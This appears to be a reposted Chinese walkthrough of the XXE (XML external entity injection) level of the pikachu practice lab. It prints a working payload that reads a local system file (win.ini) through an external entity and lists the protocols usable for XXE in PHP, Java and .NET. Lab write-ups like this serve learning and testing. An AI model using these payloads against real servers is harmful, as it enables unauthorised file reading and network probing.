pikachu XXE(XML外部实体注入)通关
靶场:pikachu
环境:
系统:Windows10
服务器:PHPstudy2018
靶场:pikachu
关卡提示说:这是一个接收xml数据的api
常用的Payload
回显
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe "XXE" > ]>
<foo>&xxe;</foo>
执行结果
查看系统文件内容
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini" > ]>
<foo>&xxe;</foo>
执行结果
XXE的危害:
文件读取
内网主机扫描
端口探测
远程代码执行
XXE漏洞可利用的协议:
ilbxml2=file/http/ftp
PHP=file、http、ftp、php、compress.zlib、compress.bzip2、data、glob、phar
Java=http、https、ftp、file、jar、netdoc、mailto、gophar
NET=file、http、https、ftp
概述
XXE -"xml external entity injection"
既"xml外部实体注入漏洞"。
概括一下就是"攻击者通过向服务器注入指定的xml实体内容,从而让服务器按照指定的配置进行执行,导致问题"
也就是说服务端接收和解析了来自用户端的xml数据,而又没有做严格的安全控制,从而导致xml外部实体注入。
原文地址:https://blog.csdn.net/2301_77012231/article/details/142344496
免责声明:本站文章内容转载自网络资源,如本站内容侵犯了原著者的合法权益,可联系本站删除。更多内容请关注自学内容网(zxcms.com)!